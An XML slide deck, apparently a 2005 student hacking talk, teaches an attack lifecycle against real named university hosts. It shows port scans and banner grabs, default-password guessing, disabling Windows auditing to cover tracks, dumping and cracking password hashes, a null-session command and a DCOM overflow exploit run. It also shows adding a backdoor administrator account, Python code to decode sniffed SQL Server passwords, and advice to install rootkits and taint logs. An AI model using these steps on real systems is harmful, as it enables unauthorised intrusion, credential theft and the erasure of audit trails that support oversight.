<?xml version="1.0"?>
<?xml-stylesheet type="text/xml" href="presenter.xsl"?>
<slideshow>
	<title> Hackery </title>
	<slide> <title>Hacking</title><!--{{{-->
		<body>
			Hacking requires patience, knowledge, and the proper tools. Patience
			doesn't grow on trees. If you don't have it, you're not going to be
			doing anything useful. Knowledge is crucial when trying to break a
			system. Lastly, without the proper tools, you aren't going to be
			effective.

			<p/>

			It pretty much goes like this:
			<ol>
				<li> Reconnaissance (scanning, discovery, enumeration) </li>
				<li> Penetration (oh baby?) </li>
				<li> Cleanup </li>
				<li> Expand influence </li>
			</ol>

			Reconnaissance requires patience. Mapping network resources isn't
			fast, and passive mapping (sniffing, etc) is slower still. Social
			engineering takes effort and skill. Gathering information is usually
			the most time-consuming task, for your computer or for yourself.

			<p/>

			Penetration is the fun part: breaking into a machine or network. Now
			that you know what services are running where, and how the network is
			laid out, you need to break in. Different attacks work against
			different services, and there will certainly be exploits available
			for the older network services.

			<p/>

			Once you've broken in, the next step should be to install some sort
			of backdoor or other persistence tool, usually called a root kit, to
			ensure your continued connectivity and "ownership" of that machine.
			Once the machine is secured, clean up any audit trail it may hold of
			your break-in attempts. Cover your tracks.

			<p/>

			Now that your tracks are covered, you can move on to another machine
			if you get bored with the one you have. Compromising one machine
			often makes it easier to compromise others (reused passwords, trust
			relationships, traffic you can now sniff).
			
		</body>
	</slide><!--}}}-->

	<slide> <title>Reconnaissance</title><!--{{{-->
		<body>
			Reconnaissance is a long word...
		  
			<p/>
			But more than that, it's the first set of activities you'll need to be
			doing when you want to exploit vulnerabilities. How, you might ask, are
			you supposed to do surveillance and discovery? Good thing you asked.
			There are a number of scanning and discovery tools available to you in
			both Windows and Unix. 

			<p/>

			This is always the first step on the road to mischief. You can't hack
			what you can't see, right? So you need to find out what services and
			software are running on whatever you want to break. Textbooks on
			hacking will use buzzwords like <i>enumeration</i>,
			<i>foot-printing</i>, and <i>scanning</i>. Long story short, you need
			to discover what is available on the network for exploitation.

			<p/>

			<ul>
				<li> foot-printing: Who are we going to target? </li>
				<li> scanning: What services and machines are online? How is the
				network configured? </li>
				<li> enumeration: What versions of services are running? How can we
				exploit them? </li>
			</ul>

			There are a number of ways to do all of the above; some methods are
			passive, others active. Passive means you never touch the target
			(sniffing traffic, public records). Active means you poke it, which
			makes you visible: banner grabbing, port scanning, service queries
			and other probes.
		</body>
	</slide><!--}}}-->

	<slide> <title>Foot-printing</title><!--{{{-->
		<body>
			Understanding the target's complete technical setup: domain names,
			location of critical systems, VPN access points, third-party
			connectivity, etc.
			<p/>

			Techniques:

			<ul>
				<li>Do Whois searches to get company information (tech contacts), name servers, MX records, etc</li>
				<li>Search Google for: tsweb/Default.htm or other known defaults like C:\Inetpub (<a href="http://www.hillsboroughtitle.com/tsweb/default.htm">here's an example</a>)</li>
			</ul>

			Guessing passwords is a simple and inelegant approach, but it's highly effective, especially with Windows users:
			<ul>
				<li>Lab or test accounts (username: Test, blank password)</li>
				<li>Password or useful hints in comment field</li>
				<li>Try shared group accounts (like backup or admin)</li>
				<li>Check for new accounts or users that haven't changed their
				password recently, they may have a password of 'welcome' or
				the name of the organization (such as 'rit').</li>
			</ul>
		</body>
	</slide><!--}}}-->

	<slide> <title> Vulnerability Recon </title><!--{{{-->
		<body>
			<h4> Beware the awesome power of... the Banner </h4>
			Knowing which service, and which version of it, is running will help
			immensely in your mighty quest for exploits, and a banner probe is
			the cheapest way to find out.

			<p/>

			Lots of services have banners on connect, ssh and smtp are just a few:
			<code><![CDATA[% nc -w 1 mail.rit.edu 25
220 filer2.rit.edu -- Server ESMTP (PMDF V6.2-X26#30844)
% nc -w 1 filer2.rit.edu 22  
SSH-2.0-3.2.5 SSH Secure Shell (non-commercial)
]]></code>

			Whew! That was hard. Now I know that mail.rit.edu is really
			filer2.rit.edu (thanks, banner!), that the mail system is PMDF V6.2,
			and that the ssh server is ssh.com's "SSH Secure Shell" version
			3.2.5 (the non-commercial build).

			<p/>
			Software version numbers aren't the only data you can glean from
			banners. Take <i>filer2.rit.edu</i>'s telnet banner:
			<code><![CDATA[% nc -w 1 filer2.rit.edu 23

Logging session: unknown@whack.csh.rit.edu to filer2.rit.edu

****************************************************************************
**                                                                        **
**                   UNAUTHORIZED CONNECTION REFUSED                      **
**                                                                        **
**                  Information Systems and Computing                     **
**                  Rochester Institute of Technology                     **
**                                                                        **
**      This system is not for general user access, and connections       **
**      are restricted. Please disconnect immediately, and do not         **
**      attempt to re-connect.                                            **
**                                                                        **
**      General user systems are the VMScluster nodes (vaxa-f, vms1-4),   **
**      Grace, or any SGI workstation.                                    **
**                                                                        **
**           Questions may be directed to the ISC Help Desk at:           **
**                  services@rit.edu or (716) 475-4357                    ** 
**                                                                        **
****************************************************************************


]]></code>

			Well, someone certainly doesn't want me logging in via telnet, right?
			But they were kind enough to show me that the telnet banner hasn't
			been updated in at least 4 years. How do I know that? Having done my
			research (have you?), I know that <b>ISC</b> no longer exists at RIT.
			It is now called <b>ITS</b>. Furthermore, the area code for
			Rochester, NY changed to 585 several years ago (4ish?). There's a
			pretty good chance the telnet service hasn't been updated since then
			either. My next task would be to figure out what kind of system and
			version of telnet it is running, but I already know it's a Tru64 4.1
			machine from past experience. I can probably guess it's running the
			stock telnet daemon. Now all I need to do is look for exploits.

			<p/>

			How about some more recon? It helps to really know the protocols you
			want to exploit, for when you don't have a tool to probe for you.
			Let's ask RIT about its primary webserver, shall we? (The echo below
			relies on the shell's echo expanding \n into a newline; HTTP wants
			the request line followed by a blank line, so the portable form is
			printf 'HEAD / HTTP/1.0\r\n\r\n' piped into nc.)

			<code><![CDATA[% echo "HEAD / HTTP/1.0\n" | nc www.rit.edu 80
HTTP/1.1 200 OK
Date: Wed, 21 Sep 2005 06:50:06 GMT
Server: Apache/1.3.9 Apache-SSL/1.36 (Unix) mod_perl/1.21 PHP/3.0.12
Connection: close
Content-Type: text/html
]]></code>

			Apache 1.3.9? PHP 3.x? Either this webserver hasn't been updated
			since 1999, or somebody trimmed or faked the Server header (an admin
			can make it say whatever they like), so treat a banner as a strong
			hint rather than proof and confirm it another way before you sink
			time into an exploit. Hopefully by now you understand what banner
			probing is. If not, then perhaps you should consider a more Liberal
			Arts-like major.

			Obviously, Google is the first place to look for what is probably
			exploitable. Other websites that can clue you into vulnerability
			information are:

			<ul>
			<li> <a href="http://www.cert.org">CERT</a> - Computer
			Emergency Response Team. A very popular place to find new vulnerability
			information.</li>
			<li> <a href="http://www.securityfocus.com">SecurityFocus</a> -
			 another hugely popular website for vulnerability disclosure and
			 reports</li>
			<li> <a href="http://www.secunia.com">Secunia</a> -
			well-presented website with up-to-date information on vulnerabilities
			on lots of software. Easy to search, categorized by types and
			applications. </li>
			<li> <a href="http://www.zone-h.org">zone-h</a> - a more
			"hacker"-oriented security vulnerability site </li>
			</ul>
		</body>
	</slide><!--}}}-->

	<slide> <title>Post-Reconnaissance</title><!--{{{-->
		<body>
			So you've done your homework. You discovered machines and services,
			perhaps you also know the version of some services that are running.
			What next? 
			
			<p/>

			Using your knowledge of how the network is connected and what services
			are running, you need to find (or write) the tools that will help you
			exploit these services.

			<p/>

			Understanding what is exploitable requires an understanding of the
			services themselves. You need to consider the following:

			<ul>
				<li> Is the service network-oriented? </li>
				<li> Does it require local login to access? </li>
				<li> Might the service use host-based trust relationships? </li>
				<li> Can you exploit the service by using MITM? </li>
				<li> Are there known vulnerabilities for this particular version? </li>
				<li> Does the network service use encryption? </li>
			</ul>

			If you don't have physical access to the machine, you obviously have
			only one route in: the network. To get local access, a network
			service has to be exploited. Most often that means a buffer overflow,
			but other exploit methods are just as likely.
		</body>
	</slide><!--}}}-->

	<slide> <title> Networked Services </title><!--{{{-->
		<body>
			In today's average multi-computer, multi-user environment, you can
			expect to find many networked services. A Windows environment might
			have such services as file and print sharing, shared authentication,
			Active Directory, remote desktop, VNC, and others. A Unix environment
			may have other services such as nfs, nis, ldap, ssh, etc. Any
			environment is just as likely to have mail and web services.

			<p/>

			Many of these services will be vulnerable to simple MITM (Man In The
			Middle) attacks or to other kinds of attacks such as remote resource
			starvation. MITM attacks are easily executed with prewritten tools
			and work against most standard unencrypted services. But without
			proper trust verification (a client that accepts any certificate or
			any ssh host key it is shown), many "secure" protocols are just as
			vulnerable to MITM.

			<p/>
			Simple network-based attacks include:
			<ul>
				<li> MITM </li>
				<li> Syn flood (resource starvation) </li>
				<li> Switch poisoning and IP spoofing </li>
			</ul>

			Think your precious SSL-protected services are free from script
			kiddies? With OpenSSL I can simply connect as if I were using telnet.

		</body>
	</slide><!--}}}-->

	<slide> <title> (Unix) Tools </title><!--{{{-->
		<body>
			It's getting to be that time where theory and such aren't going to be
			enough to help you. You need tools and the knowledge to employ them.
			For the moment, let's pretend we are in the scanning and enumeration
			phase of our shenanigans. Let's also pretend that we have a fairly
			basic install of a modern free Unix-like operating system, such as
			Linux, FreeBSD, or OpenBSD.

			<p/>
			The most basic tools you will have at your disposal are going to be the
			following:
			<ul>
				<li> ping </li>
				<li> nslookup/host/dig </li>
				<li> telnet </li>
				<li> netcat </li>
				<li> tcpdump/snoop </li>
				<li> openssl </li>
				<li> grep </li>
			</ul>

			Believe it or not, with these basic tools, you can do almost all of the
			scanning and enumeration you will need to do. Certainly it doesn't hurt
			to have better, faster tools at your disposal, so you'll want to get
			your hands on:

			<ul>
				<li> netcat (if you don't have it) </li>
				<li> <a href="http://insecure.org/nmap">nmap</a> - network mapping
				tool </li>
				<li> <a
				href="http://www.laurentconstantin.com/en/netw/netwox/">netwox</a> -
				network testing utility toolkit </li>
				<li> <a href="http://ettercap.sf.net">ettercap</a> - MITM/sniffing
				tool </li>
				<li> <a href="http://www.ethereal.com">ethereal</a> - tcpdump for
				kids who aren't cool enough for tcpdump. </li>
				<li> <a
				href="http://www.securityfocus.com/tools/176">fragrouter?</a> - tool
				for testing firewall stupidity (with fragmented packets) </li>
				<li> <a href="http://xprobe.sourceforge.net">xprobe2</a> - extremely
				fast remote OS fingerprinting tool</li>
				<li> <a href="http://www.monkey.org/~dugsong/dsniff/">dsniff</a> -
				collection of tools for network auditing and penetration testing </li>

			</ul>
		</body>
	</slide><!--}}}-->

	<slide> <title> (Unix) Scanning </title><!--{{{-->
		<body>
			<center><img
			src="http://images.insecure.org/nmap/images/prop/nmap_bnr_matrix_iain.gif"
			align="center"/></center>
			<br/>
			There are two things you want to do first when scanning:
			<ul>
			<li>nmap to find online machines and services</li>
			<li>dig/nslookup for a zone transfer from a dns server</li>
			</ul>

			Both of these will give you plenty of information about what the
			network looks like. READ THE NMAP MAN PAGE, THANKS.

			<p/>

			<code><![CDATA[
whack(~) [1002] % nmap -sP 129.21.38.0/24

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-21 03:27 EDT
Host 129.21.38.0 appears to be up.
Host jueunie.rit.edu (129.21.38.33) appears to be up.
Host rm13141.rit.edu (129.21.38.72) appears to be up.
Host prlbenrd.rit.edu (129.21.38.177) appears to be up.
Host rm13108.rit.edu (129.21.38.183) appears to be up.
Host rm07364.rit.edu (129.21.38.190) appears to be up.
Nmap finished: 256 IP addresses (6 hosts up) scanned in 1.319 seconds
]]></code>
			
			Well, I certainly know which machines are alive on the small section
			of the network I scanned. (-sP is the ping sweep; nmap 5.x and later
			spell it -sn.) You can do more in-depth scanning on individual hosts
			or on an entire subnet with a different kind of scan. Other typical
			scans are:
			<ul>
				<li> -sT : TCP connect() scan; completes the handshake, so the
				service sees (and may log) a real connection </li>
				<li> -sS : TCP SYN scan; sends the SYN and tears down on the
				SYN/ACK without completing the handshake (needs root) </li>
				<li> -sV : Version detection (banner and protocol probes) </li>
			</ul>

			There are obviously other options and other scanning methods, but like
			I said: Read the manpage. If you have questions, ask.

		</body>
	</slide><!--}}}-->

	<slide> <title> Scanning Notes </title><!--{{{-->
		<body>
		Things you should keep in mind:
		<ul>
			<li> Some firewalls don't take kindly to certain network scans </li>
			<li> Overzealous scanning will get noticed. </li>
			<li> Certain kinds of scans may incapacitate weaker machines
			(Accidental? DoS)</li>

			<li> IDS's WILL log your activity. If you can incapacitate the IDS,
			you'll have less of an audit trail. </li>
		</ul>
		</body>
	</slide><!--}}}-->

	<slide> <title>(Unix) Enumeration </title><!--{{{-->
		<body>
			Hopefully by now you know what ports are open on which machines.
			Now you'll need to find out what versions of what software are
			running. Some folks decide that <i>security through obscurity</i>
			(Microsoft, anyone?) is the best strategy for security, so chances
			are you'll find a service running on a nonstandard port. That hides
			it from a port-number lookup, not from a version probe.

			<p/>

			Banner and protocol testing:
			<ul>
				<li> nmap -sV </li>
				<li> netcat or telnet </li>
			</ul>

			Some protocols (http, ldap, etc) don't send a banner when you
			connect; the client is expected to speak first. For those you have
			to "guess" the protocol and send it a well-formed request (an HTTP
			HEAD, an LDAP bind) before you'll see anything. nmap -sV does
			exactly this with its probe database, and you can do it by hand with
			netcat.
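
			<p/>

			The nc and nmap -sV workflow from the Vulnerability Recon slide and
			this one, written out by hand as an added example (this is not code
			from the original slides): a TCP connect() scan, then a banner grab
			that waits for a server-speaks-first greeting and falls back to
			sending an HTTP HEAD when the service stays quiet. The fake ssh and
			web services at the bottom are constructed so it runs offline
			against 127.0.0.1; their banners are made up, not captures.
			<code><![CDATA[
```python
"""TCP connect() scan followed by a banner grab, with a fallback probe.

Added example, not code from the original slides.  It is the nc / nmap -sV
workflow written out by hand: a connect() scan (what nmap -sT does, and
what the target's service will log), then a banner grab that first waits
for a server-speaks-first greeting (ssh, smtp, ftp) and, if nothing
arrives, sends a protocol probe (an HTTP HEAD) and reads the reply.  The
fake services at the bottom are constructed so that everything runs
offline against 127.0.0.1; their banners are made up, not captures.
"""
import socket
import threading

# Client-speaks-first probe used when a service sends no greeting.
HTTP_HEAD = b"HEAD / HTTP/1.0\r\n\r\n"


def connect_scan(host, ports, timeout=0.5):
    """Return the ports in `ports` that complete a full TCP handshake."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


def grab_banner(host, port, probe=HTTP_HEAD, timeout=1.0):
    """Read a greeting; if the service stays quiet, send `probe` and read."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            data = s.recv(1024)          # ssh/smtp/ftp greet us first
        except socket.timeout:
            data = b""
        if not data and probe:
            s.sendall(probe)             # http/ldap wait for us to speak
            try:
                data = s.recv(4096)
            except socket.timeout:
                data = b""
    return data.decode("latin-1", "replace").strip()


def server_header(banner):
    """Pull the Server: value out of an HTTP response, or None."""
    for line in banner.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "server":
            return value.strip()
    return None


def start_fake_service(greeting=b"", reply=b""):
    """Constructed stand-in for a daemon on 127.0.0.1; returns its port.

    With `greeting` it talks first (like sshd); with `reply` it waits for
    a request and answers it (like httpd).
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            try:
                with conn:
                    if greeting:
                        conn.sendall(greeting)
                    elif reply:
                        conn.settimeout(2)
                        conn.recv(1024)  # wait for the client's request
                        conn.sendall(reply)
            except OSError:
                pass  # peer hung up early, e.g. the connect() scan

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    sshd = start_fake_service(greeting=b"SSH-2.0-OpenSSH_3.7p1\r\n")
    httpd = start_fake_service(
        reply=b"HTTP/1.1 200 OK\r\nServer: Apache/1.3.9 (Unix)\r\n\r\n")
    for port in connect_scan("127.0.0.1", [sshd, httpd, 1]):
        print(port, repr(grab_banner("127.0.0.1", port)))
```
]]></code>
			Run it as a script and it prints each open port with whatever came
			back. The timeouts are deliberately short; against a real host over a
			slow link raise them, and remember that a connect() scan shows up in
			the target's logs exactly like nmap -sT does.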
		</body>
	</slide><!--}}}-->

	<slide> <title>(Windows) Foundstone ScanLine </title><!--{{{-->
		<body>
			Options:<br/>
			<code>
-b  - Get port banners
-c  - Timeout for TCP and UDP attempts (ms). Default is 4000
-d  - Delay between scans (ms). Default is 0
-f  - Read IPs from file. Use "stdin" for stdin
-g  - Bind to given local port
-h  - Hide results for systems with no open ports
-i  - For pinging use ICMP Timestamp Requests in addition to Echo Requests
-j  - Don't output "-----..." separator between IPs
-l  - Read TCP ports from file
-L  - Read UDP ports from file
-m  - Bind to given local interface IP
-n  - No port scanning - only pinging (unless you use -p)
-o  - Output file (overwrite)
-O  - Output file (append)
-p  - Do not ping hosts before scanning
-q  - Timeout for pings (ms). Default is 2000
-r  - Resolve IP addresses to hostnames
-s  - Output in comma separated format (csv)
-t  - TCP port(s) to scan (a comma separated list of ports/ranges)
-T  - Use internal list of TCP ports
-u  - UDP port(s) to scan (a comma separated list of ports/ranges)
-U  - Use internal list of UDP ports
-v  - Verbose mode
-z  - Randomize IP and port scan order

Example: sl -bht 80,100-200,443 10.0.0.1-200
			</code>
		</body>
	</slide><!--}}}-->

	<slide> <title>(Windows) ScanLine Example</title><!--{{{-->
		<body>
			<code><![CDATA[
	C:\ >sl -b -p -t 22 <machinename>
	ScanLine (TM) 1.01
	Copyright (c) Foundstone, Inc. 2002
	http://www.foundstone.com

	Scan of 1 IP started at Tue Sep 20 22:58:39 2005

	-----------------------------------------------------------
	129.21.##.##
	Responds with ICMP unreachable: No
	TCP ports: 22


	TCP 22:
	[SSH-1.99-OpenSSH_3.7p1]

	-----------------------------------------------------------

	Scan finished at Tue Sep 20 22:58:39 2005

	1 IP and 1 port scanned in 0 hours 0 mins 0.02 secs
]]>
			</code>
		</body>
	</slide><!--}}}-->

	<slide> <title> (Windows) Enumeration</title><!--{{{-->
		<body>
			Extract information like user accounts and poorly protected
			resource shares.
			<p/>

			Useful Built-in Tools:

			<dl>
				<dt>To show available domains: </dt>
				<dd> net view /domain </dd>
				<dt> To show all computers in that domain: </dt>
				<dd> net view /domain:&lt;domainname&gt; </dd>
				<dt>Show the remote machine's NetBIOS name table (system name,
				domain, logged-on user and running services): </dt>
				<dd>nbtstat -A &lt;ipaddr&gt;</dd>
			</dl>
		</body>
	</slide><!--}}}-->

	<slide> <title>(Windows) Auditing</title><!--{{{-->
		<body>
			Check Auditing Policies (this is the Windows 2000 Resource Kit
			auditpol.exe; the auditpol.exe built into Vista and later uses /get
			and /set instead):
			<code><![CDATA[
C:\ >auditpol \\<computername>
Running ...

(X) Audit Enabled     <- Auditing enabled, need to turn it off

AuditCategorySystem            = Success and Failure
AuditCategoryLogon             = Success and Failure
AuditCategoryObjectAccess      = Success and Failure
AuditCategoryPrivilegeUse      = Success and Failure
AuditCategoryDetailedTracking  = Success and Failure
AuditCategoryPolicyChange      = Success and Failure
AuditCategoryAccountManagement = Success and Failure
Unknown                        = Success and Failure
Unknown                        = Success and Failure
]]>
</code>

Turn off Auditing:
<code><![CDATA[
C:\ >auditpol \\<computername> /disable
Running ...

Audit information changed successfully on \\<computername> ...
New audit policy on \\<computername> ...

(0) Audit Disabled

AuditCategorySystem            = Success and Failure
AuditCategoryLogon             = Success and Failure
AuditCategoryObjectAccess      = Success and Failure
AuditCategoryPrivilegeUse      = Success and Failure
AuditCategoryDetailedTracking  = Success and Failure
AuditCategoryPolicyChange      = Success and Failure
AuditCategoryAccountManagement = Success and Failure
Unknown                        = Success and Failure
Unknown                        = Success and Failure
]]>
			</code>
		</body>
	</slide><!--}}}-->

	<slide> <title>(Windows) Password Hashes</title><!--{{{-->
		<body>
			pwdump2 injects into lsass.exe, so its argument is lsass's PID (576
			here; get it from Task Manager or tlist). The hash fields in this
			capture are not shown in full.
			<code><![CDATA[
C:\ >pwdump2 576 > hashes.txt

Administrator:50aa0:
Bob:10cwec03:
Guest:50:aad3b4404ee
HelpAssistant:1000:
SUPPORT_38wwgw945a0:1002:

C:\>john hashes.txt
Loaded 2 passwords with no different salts (NT LM DES [24/32 4K])
(Bob:2)
FOO              (Bob:1)
guesses: 2  time: 0:00:00:01 (3)  c/s: 153442  trying: FAS -
NSK
]]>
			</code>
	  </body>
  </slide><!--}}}-->

  <slide> <title>(Windows) Searching the Filesystem</title><!--{{{-->
	  <body>
		  <code><![CDATA[
C:\ >find "password" *.txt

---------- PLEASE_DONT_README.TXT
i save user's passwords in plain text files, yay!
]]>
			</code> 
			Or for more in-depth results, use findstr (/s searches the current
			directory and all subdirectories):
			<code><![CDATA[
C:\ >findstr /s payroll *.xls
]]></code>
	  </body>
  </slide><!--}}}-->

	<slide> <title> Penetration *moan* </title><!--{{{-->
		<body> 
			Penetration is just what it sounds like: the "break in" process of
			hacking someone else's poor machines. Penetration can occur a number
			of ways, but the primary means are remote exploitation and local
			exploitation.

			<p/>

			Things to exploit:
			<ul>
				<li> Networked services often employ trust relationships for
				security. </li>
				<li> Many network services are unencrypted </li>
				<li> Much (especially older) service software is extremely
				vulnerable </li>
				<li> Local attacks are more effective than remote ones: once you
				have a shell there is far more to work with </li>
			</ul>

			Break in remotely, secure your position on the machine locally, THEN
			worry about doing other nasty things. If you don't install a root kit
			or other tool to ensure your continued access over the network, it is
			very possible that the exploit you used is a one-shot attack that
			brings the service down with it. You may only get one shot.
		</body>
	</slide><!--}}}-->

	<slide> <title>(Windows) Hacking Services</title><!--{{{-->
		<body>
		<h4>IIS</h4>
		Using telnet or netcat, you can connect to the IIS server on port 80 and
		type requests by hand: a query to get the version (HEAD / HTTP/1.0
		followed by a blank line, i.e. [CRLF] [CRLF]), or a crafted request that
		triggers a buffer overflow in a vulnerable version.

		<p/>

		<h4>SQL Server</h4>
		Can be as simple as using the Query Analyzer to connect to the remote
		SQL server and guessing the sa password. If guessing doesn't work, tools
		like SQLdict or sqlbf will run dictionary attacks against the sa
		password. If that's too much work for you, a tool called sqlpoke will
		search for SQL servers with a blank sa password.

		<p/>

		Also, SQL Server login passwords are not encrypted on the wire by
		default, just scrambled: each byte of the password has its two hex
		digits (nibbles) swapped and is then XORed with a constant. So all you
		have to do is take a packet capture of the login and undo it, one byte
		at a time:

		<p/>

		<code><![CDATA[
Hex A2 -> 2A (swap the nibbles) -> binary -> XOR with binary of 5A -> convert
back to hex (70, which is 'p') and you have the first letter of the password
]]></code>
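
		<p/>

		The same recipe as working code, an added example rather than anything
		from the original slides. The decode side is exactly the
		swap-then-XOR-with-5A step above; the encode side is its inverse as the
		TDS login packet does it (swap, then XOR with A5; the two agree because
		swapping the nibbles of A5 gives 5A). The "captured" bytes it is run on
		are constructed, not from a real packet capture.
		<code><![CDATA[
```python
"""Undo the TDS login-packet password scrambling from the slide above.

Added example, not code from the original slides.  tds_decode_password is
exactly the slide's recipe: swap the two nibbles of each byte, then XOR
with 0x5A.  tds_encode_password is the inverse as the client does it
(swap, then XOR with 0xA5); they agree because swapping the nibbles of
0xA5 gives 0x5A.  The "captured" bytes in the demo are constructed, not
taken from a real packet capture.
"""


def swap_nibbles(b):
    """0xA2 becomes 0x2A (high and low four bits exchanged)."""
    return (b % 16) * 16 + b // 16


def tds_encode_password(plain):
    """What the client puts on the wire: swap nibbles, XOR with 0xA5."""
    return bytes(swap_nibbles(b) ^ 0xA5 for b in plain)


def tds_decode_password(captured):
    """The slide's method: swap nibbles, XOR with 0x5A."""
    return bytes(swap_nibbles(b) ^ 0x5A for b in captured)


def password_from_capture(captured):
    """Decode, then pick the text encoding.

    TDS 7.x sends the password as UCS-2 (every other byte is 0x00 for
    plain ASCII); TDS 4.2 sent one byte per character.
    """
    raw = tds_decode_password(captured)
    is_ucs2 = (len(raw) > 0 and len(raw) % 2 == 0
               and all(raw[i] == 0 for i in range(1, len(raw), 2)))
    return raw.decode("utf-16-le") if is_ucs2 else raw.decode("latin-1")


if __name__ == "__main__":
    # The slide's worked byte: A2 -> 2A -> XOR 5A -> 70, which is 'p'
    print(tds_decode_password(bytes([0xA2])))
    # Constructed capture: what a TDS 7 client sends for "password"
    wire = tds_encode_password("password".encode("utf-16-le"))
    print(wire.hex(), password_from_capture(wire))
```
]]></code>
		The one thing the slide's single byte doesn't show: TDS 7.x sends the
		password as UCS-2, so every other decoded byte is 0x00 and the on-wire
		bytes alternate with A5. password_from_capture checks for that pattern
		and decodes accordingly.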

		Finally, code injection is always a possibility with IIS (as it is with
		any database server).
		
		<p/>

		<h4>Terminal Services</h4>
		To locate a terminal server, scan machines for an open TCP port 3389 or
		do a Google search for the default TS Web authentication page. Tools
		like TSProbe and TSEnum will search a subnet for terminal servers.
		TSGrinder (hammerofgod.com) will run dictionary attacks against a
		terminal server; a TS logon counts as an interactive logon, and the
		built-in Administrator account is exempt from the lockout threshold by
		default, so you can hammer Administrator for as long as you like.
		</body>
	</slide><!--}}}-->

	<slide> <title>(Windows) NetBIOS Null Sessions</title><!--{{{-->
		<body>
			<code>net use \\target\ipc$ "" /user:""</code>

			Originally, Microsoft let anyone with an unauthenticated ("null")
			session browse lists of users and other connected systems. It turns
			out this is a bad idea (surprised?)<br />

			Null sessions were members of the Everyone group, which gave them
			access to privileged information: all of the groups, users, SMB
			shares, and even privilege information. Microsoft later split
			Authenticated Users out of Everyone and, starting with Windows 2003
			(and XP SP2), restricts what an anonymous session can enumerate by
			default (the RestrictAnonymous setting); older or loosely configured
			systems still hand it all over. <br />

			Once you have a machine scanned, look for ports 135, 137, 138, 139
			and 445. If they are open, the machine may be vulnerable to null
			sessions. <br />
		</body>
	</slide><!--}}}-->

	<slide> <title>(Windows) NetBIOS Null Session Tools</title><!--{{{-->
		<body>
			<ul>
				<li><b>DumpSec</b> - An enumeration program that provides a GUI
				interface to enumerate groups, users, shares, and permissions
				<br/>

				<img src="http://home.ubalt.edu/abento/753/enumeration/dumpsec.gif"
				width="400" />
				<br/>
				</li>

				<li><b>enum</b> - Can retrieve userlists, machine lists,
				sharelists, namelists, group and member lists, password and LSA
				policy information. enum is also capable of a rudimentary brute
				force dictionary attack on individual accounts.
				<code><![CDATA[
usage:  enum  [switches]  [hostname|ip]
	-U:  get userlist
	-M:  get machine list
	-N:  get namelist dump (different from -U|-M)
	-S:  get sharelist
	-P:  get password policy information
	-G:  get group and member list
	-L:  get LSA policy information
	-D:  dictionary crack, needs -u and -f
	-d:  be detailed, applies to -U and -S
	-c:  don't cancel sessions
	-u:  specify username to use (default "")
	-p:  specify password to use (default "")
	-f:  specify dictfile to use (wants -D)
]]>
				</code>
				</li>
			</ul>
		</body>
	</slide><!--}}}-->

	<slide> <title>(Windows) DCOM Exploits</title><!--{{{-->
		<body>
			DCOM is the Distributed Component Object Model, and is a method that
			Microsoft uses to allow many of their software applications to
			communicate with each other and other Windows systems.  

			<p/>

			Downloaded Exploit at <a href="http://www.securityforest.com/">Security
			Forest</a> via the ExploitTree.

			<code><![CDATA[
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Usage: ./dcom <Target ID> <Target IP>
- Targets:
-          0    Windows 2000 SP0 (english)
-          1    Windows 2000 SP1 (english)
-          2    Windows 2000 SP2 (english)
-          3    Windows 2000 SP3 (english)
-          4    Windows 2000 SP4 (english)
-          5    Windows XP SP0 (english)
-          6    Windows XP SP1 (english)
]]>
			</code>

			<code><![CDATA[
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>

- Using return address of 0x77f92a9b
]]>
			</code>

			This will give you a Windows Systems Level Shell to play with.  So what
			do we do from here?  Time to copy over something nice and fun to give
			us access, but how?  

			<code><![CDATA[
C:\> net user NewAdmin CoolPassword /add
C:\> net localgroup Administrators NewAdmin /add 
]]></code>

			Now browse the administrative share on the PC, \\Computer\c$, upload
			a file, then use your DCOM shell to run what you uploaded.
		</body>
	</slide><!--}}}-->

	<slide> <title>Metasploit</title><!--{{{-->
		<body>

		</body>
	</slide><!--}}}-->

	<slide> <title> Expanding your Influence </title><!--{{{-->
		<body>
			Based on services running on systems, start tracking down other hosts
			this host may have access to. Employ any passwords that you have
			gained by cracking password hashes as likely guesses for accounts on
			other machines.  If your mission is just to be a jack ass, start
			altering key files and tainting audit logs.

			<p/>

			Examine your new pet machine and look for trust relationships with
			other hosts. Look for shared authentication, networked disk (nfs or
			samba), etc. You need to know about the system before you can use it
			to your advantage.
		</body>
	</slide><!--}}}-->

	<slide> <title>Root Kits</title><!--{{{-->
		<body>
			A root kit is a tool you install once a machine has been compromised
			to maintain your access to the system later. There are many root
			kits available for Windows systems that do many different things.
			Some will simply give you a VNC connection to the system, while
			others log keystrokes, web connections, and logins to other machines
			to extend your evil influence. Finally, root kits hide themselves
			very carefully so that uneducated (and some educated) people will not
			know they are there.

			<p/>

			A root kit's automated log cleanup is almost always easy to spot
			(utmp gets blown away wholesale, for example) because root kit
			programmers are probably just lazy. There are many automated
			root-kit checkers available, both free and for dollars.

			<ul>
				<li><b>Back Orifice</b> - "BO2K puts network administrators solidly
				back in control. In control of the system, network, registry,
				passwords, file system, and processes. BO2K is a lot like other
				major file-synchronization and remote control packages that are on
				the market as commercial products."</li>
				<li><b>FU</b> - The FU root kit is another option; it loads
				itself and then uses Direct Kernel Object Manipulation to
				elevate its process from a user-level program to a system-level
				one, giving it nearly unlimited access.</li>
				<li><b>Klister</b> - Klister is not a root kit, but instead an
				information gathering tool about a system.  It uses different
				kernel level methods of gathering information so that it can find
				information about even some other root-kits. </li>
			</ul>

			<u>For more information: </u>
			<ol>
				<li><a href="http://en.wikipedia.org/wiki/Root_kit">wikipedia's
				article on root kits</a> </li>
				<li><a href="http://www.rootkit.com/">http://www.rootkit.com/</a></li>
				<li><a href="http://www.egocrew.de/download.html">http://www.egocrew.de/download.html</a></li>
			</ol>
